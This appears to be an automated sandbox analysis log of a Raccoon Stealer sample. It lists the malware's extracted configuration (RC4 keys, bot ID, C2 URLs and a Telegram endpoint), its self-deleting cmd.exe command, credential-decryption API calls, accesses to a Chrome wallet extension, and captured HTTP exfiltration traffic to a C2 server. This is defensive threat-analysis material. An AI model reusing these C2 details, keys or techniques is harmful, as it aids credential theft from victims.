{"RC4_key2": "18da7081a9d4e661b6bc9f680269eafe", "C2 url": ["http://178.23.190.57/rino115sipsip", "http://91.219.236.162/rino115sipsip", "http://185.163.47.176/rino115sipsip", "http://193.38.54.238/rino115sipsip", "http://74.119.192.122/rino115sipsip", "http://91.219.236.240/rino115sipsip", "https://t.me/rino115sipsip"], "Bot ID": "fcdc156d3872c18d25e3ee45499599b45e492a67", "RC4_key1": "hGjLqSdWvLpVmBeD"}
Source: Process started | Author: frack113: Data: Command: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\user\Desktop\KqxsoH2Rhn.exe", CommandLine: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\user\Desktop\KqxsoH2Rhn.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\KqxsoH2Rhn.exe" , ParentImage: C:\Users\user\Desktop\KqxsoH2Rhn.exe, ParentProcessId: 6984, ProcessCommandLine: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\user\Desktop\KqxsoH2Rhn.exe", ProcessId: 6908 |
Source: Yara match | File source: 1.2.KqxsoH2Rhn.exe.47a0e50.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.2.KqxsoH2Rhn.exe.400000.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.2.KqxsoH2Rhn.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.KqxsoH2Rhn.exe.48b0000.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.KqxsoH2Rhn.exe.48b0000.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.2.KqxsoH2Rhn.exe.47a0e50.1.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000001.00000002.378040707.00000000047A0000.00000040.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000002.377370731.0000000000400000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.283534842.00000000048B0000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: KqxsoH2Rhn.exe PID: 6984, type: MEMORYSTR |
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe | Code function: 1_2_0040E727 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData, | 1_2_0040E727 |
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe | Code function: 1_2_0040CB54 __EH_prolog,BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,LocalAlloc,BCryptDecrypt,BCryptCloseAlgorithmProvider,BCryptDestroyKey, | 1_2_0040CB54 |
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe | Code function: 1_2_0040D560 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData, | 1_2_0040D560 |
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe | Code function: 1_2_0042770E CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfW,lstrcatW,wsprintfW,lstrcatW,CryptDestroyHash,CryptReleaseContext,lstrlenW,CryptUnprotectData,LocalFree, | 1_2_0042770E |
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe | Code function: 1_2_0040F78B __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData,LocalFree, | 1_2_0040F78B |
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe | Code function: 1_2_004278E1 lstrlenW,lstrlenW,lstrlenW,CredEnumerateW,CryptUnprotectData,LocalFree,CredFree, | 1_2_004278E1 |
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe | Code function: 1_2_0040DC7B __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree, | 1_2_0040DC7B |
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe | Code function: 1_2_0041E52C __EH_prolog,_strlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,PK11_FreeSlot, | 1_2_0041E52C |
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe | Unpacked PE file: 1.2.KqxsoH2Rhn.exe.400000.0.unpack |
Source: | Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3.dll.1.dr |
Source: | Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.1.dr |
Source: | Binary string: z:\task_1552562425\build\src\obj-thunderbird\gfx\angle\targets\libEGL\libEGL.pdb source: libEGL.dll.1.dr |
Source: | Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libprldap\prldap60.pdb source: prldap60.dll.1.dr |
Source: | Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.1.dr |
Source: | Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb source: IA2Marshal.dll.1.dr |
Source: | Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: KqxsoH2Rhn.exe, 00000001.00000002.378846446.000000006EBE0000.00000002.00020000.sdmp, nss3.dll.1.dr |
Source: | Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.1.dr |
Source: | Binary string: ucrtbase.pdb source: ucrtbase.dll.1.dr |
Source: | Binary string: api-ms-win-core-memory-l1-1-0.pdb source: KqxsoH2Rhn.exe, 00000001.00000003.370376940.000000004DC97000.00000004.00000010.sdmp, api-ms-win-core-memory-l1-1-0.dll.1.dr |
Source: | Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.1.dr |
Source: | Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: ldap60.dll.1.dr |
Source: | Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.1.dr |
Source: | Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.1.dr |
Source: | Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.1.dr |
Source: | Binary string: C:\zihiwimugugi93\ragos 20\kusawuv\15.pdb source: KqxsoH2Rhn.exe |
Source: | Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.1.dr |
Source: | Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.1.dr |
Source: | Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.1.dr |
Source: | Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.1.dr |
Source: | Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.1.dr |
Source: | Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb source: nssckbi.dll.1.dr |
Source: | Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: KqxsoH2Rhn.exe, 00000001.00000002.379023402.000000006FB09000.00000002.00020000.sdmp, mozglue.dll.1.dr |
Source: | Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.1.dr |
Source: | Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3.dll.1.dr |
Source: | Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.1.dr |
Source: | Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.1.dr |
Source: | Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.1.dr |
Source: | Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.1.dr |
Source: | Binary string: msvcp140.i386.pdb source: msvcp140.dll.1.dr |
Source: | Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy_InUse.dll.1.dr |
Source: | Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.1.dr |
Source: | Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.1.dr |
Source: | Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: ldap60.dll.1.dr |
Source: | Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.1.dr |
Source: | Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb66 source: nssckbi.dll.1.dr |
Source: | Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.1.dr |
Source: | Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.1.dr |
Source: | Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.1.dr |
Source: | Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.1.dr |
Source: | Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb<< source: IA2Marshal.dll.1.dr |
Source: | Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: KqxsoH2Rhn.exe, 00000001.00000002.379023402.000000006FB09000.00000002.00020000.sdmp, mozglue.dll.1.dr |
Source: | Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\library\dummydll\qipcap.pdb source: qipcap.dll.1.dr |
Source: | Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.1.dr |
Source: | Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.1.dr |
Source: | Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.1.dr |
Source: | Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.1.dr |
Source: | Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.1.dr |
Source: | Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.1.dr |
Source: | Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.1.dr |
Source: | Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.1.dr |
Source: | Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapiDLL\mozMapi32.pdb source: mozMapi32.dll.1.dr |
Source: | Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.1.dr |
Source: | Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.1.dr |
Source: | Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.1.dr |
Source: | Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.1.dr |
Source: | Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.1.dr |
Source: | Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.1.dr |
Source: | Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.1.dr |
Source: | Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.1.dr |
Source: | Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.1.dr |
Source: | Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\msaa\AccessibleMarshal.pdb source: AccessibleMarshal.dll.1.dr |
Source: | Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.1.dr |
Source: | Binary string: aC:\zihiwimugugi93\ragos 20\kusawuv\15.pdb source: KqxsoH2Rhn.exe |
Source: | Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.1.dr |
Source: | Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: breakpadinjector.dll.1.dr |
Source: | Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.1.dr |
Source: | Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.1.dr |
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe | Code function: 1_2_0043DA90 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError, | 1_2_0043DA90 |
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe | Code function: 1_2_0045E752 FindFirstFileExW, | 1_2_0045E752 |
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\ | Jump to behavior |
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\ | Jump to behavior |
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\ | Jump to behavior |
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\ | Jump to behavior |
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\ | Jump to behavior |
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\ | Jump to behavior |
Source: Traffic | Snort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.3:49744 -> 194.180.174.182:80 |
Source: Traffic | Snort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.2.3:49744 -> 194.180.174.182:80 |
Source: Joe Sandbox View | ASN Name: SERVERASTRA-ASHU SERVERASTRA-ASHU |
Source: Joe Sandbox View | ASN Name: MIVOCLOUDMD MIVOCLOUDMD |
Source: global traffic | HTTP traffic detected: GET /rino115sipsip HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: 185.163.47.176 |
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 194.180.174.182 |
Source: global traffic | HTTP traffic detected: GET //l/f/qaHR_HwB3dP17SpzJnqt/e2fece3ec028ffea81a6e29ab137c790945d5c2c HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.182 |
Source: global traffic | HTTP traffic detected: GET //l/f/qaHR_HwB3dP17SpzJnqt/553beaf07e7bcfa31cdc14361c20d4ecff5638ed HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.182 |
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cVContent-Length: 54954Host: 194.180.174.182 |
Source: Joe Sandbox View | IP Address: 91.219.236.162 91.219.236.162 |
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 09 Nov 2021 11:38:28 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-dfcff"Accept-Ranges: bytes |